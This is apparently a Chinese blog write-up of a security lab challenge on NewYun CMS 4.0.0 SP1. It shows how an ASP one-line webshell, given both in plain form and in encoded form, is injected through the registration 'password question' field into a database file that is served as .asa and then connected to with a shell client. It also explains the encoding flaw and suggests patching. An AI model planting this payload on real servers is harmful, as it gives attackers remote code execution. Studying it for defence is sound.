墨者学院-CMS系统漏洞分析溯源(第3题)

一.漏洞描述

在用户注册或者修改个人资料中,我们可以注入一句话到数据库中,拿到shell

二.影响版本

新云CMS 4.0.0 SP1

三.漏洞复现

1.使用御剑对域名进行探测
在这里插入图片描述
登录网址为http://219.153.49.228/login.asp
2.注册用户
在“密码问题”插入一句话木马
在这里插入图片描述

一句话木马为:
<% execute request(“a”)%>”
经过Erlang 中文简体字 GB2312 转 unicode 转换来的
在这里插入图片描述

┼攠數畣整爠煥敵瑳∨≡┩愾
3.检查木马是否上传成功
数据库的默认地址:data/ask_newasp.asa
在URL输入:http://219.153.49.228:46761/data/ask_newasp.asa
在这里插入图片描述

当出现该条语句时,就证明一句话木马上传成功
在这里插入图片描述

4.上传成功后连接蚁剑
基础配置如下:
在这里插入图片描述
在这里插入图片描述
成功连接
在这里插入图片描述

四.漏洞分析

此项漏洞形成原因,在注册用户处其他部分都做了字符校验,而问题回答做了MD5加密(失去了利用价值),唯有密码提问框变量question可直接存入了数据库中,在这套CMS系统的const.asp文件中有一个函数EncodeUtfSO,它的目的就是将一些数据(比如这里的密码提示问题)从Encode编码转换成Utf8,基于这种考虑
位于/inetpub/wwwroot/inc/const.asp
源码(使用JS把中文字符转换为UTF-8):

function EncodeUtf8(s1)
  {
      var s = escape(s1);
      var sa = s.split("%");
      var retV ="";
      if(sa[0] != "")
      {
         retV = sa[0];
      }
      for(var i = 1; i < sa.length; i ++)
      {
           if(sa[i].substring(0,1) == "u")
           {
               retV += Hex2Utf8(Str2Hex(sa[i].substring(1,5)));
                
           }
           else retV += "%" + sa[i];
      }
       
      return retV;
  }
  function Str2Hex(s)
  {
      var c = "";
      var n;
      var ss = "0123456789ABCDEF";
      var digS = "";
      for(var i = 0; i < s.length; i ++)
      {
         c = s.charAt(i);
         n = ss.indexOf(c);
         digS += Dec2Dig(eval(n));
            
      }
      //return value;
      return digS;
  }
  function Dec2Dig(n1)
  {
      var s = "";
      var n2 = 0;
      for(var i = 0; i < 4; i++)
      {
         n2 = Math.pow(2,3 - i);
         if(n1 >= n2)
         {
            s += '1';
            n1 = n1 - n2;
          }
         else
          s += '0';
           
      }
      return s;
       
  }
  function Dig2Dec(s)
  {
      var retV = 0;
      if(s.length == 4)
      {
          for(var i = 0; i < 4; i ++)
          {
              retV += eval(s.charAt(i)) * Math.pow(2, 3 - i);
          }
          return retV;
      }
      return -1;
  } 
  function Hex2Utf8(s)
  {
     var retS = "";
     var tempS = "";
     var ss = "";
     if(s.length == 16)
     {
         tempS = "1110" + s.substring(0, 4);
         tempS += "10" +  s.substring(4, 10); 
         tempS += "10" + s.substring(10,16); 
         var sss = "0123456789ABCDEF";
         for(var i = 0; i < 3; i ++)
         {
            retS += "%";
            ss = tempS.substring(i * 8, (eval(i)+1)*8);
             
             
             
            retS += sss.charAt(Dig2Dec(ss.substring(0,4)));
            retS += sss.charAt(Dig2Dec(ss.substring(4,8)));
         }
         return retS;
     }
     return "";
  } 

具体原理参考链接:http://www.520ve.com/2290.html

五.防御方法

升级版本打补丁

网络信息安全-ploto

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值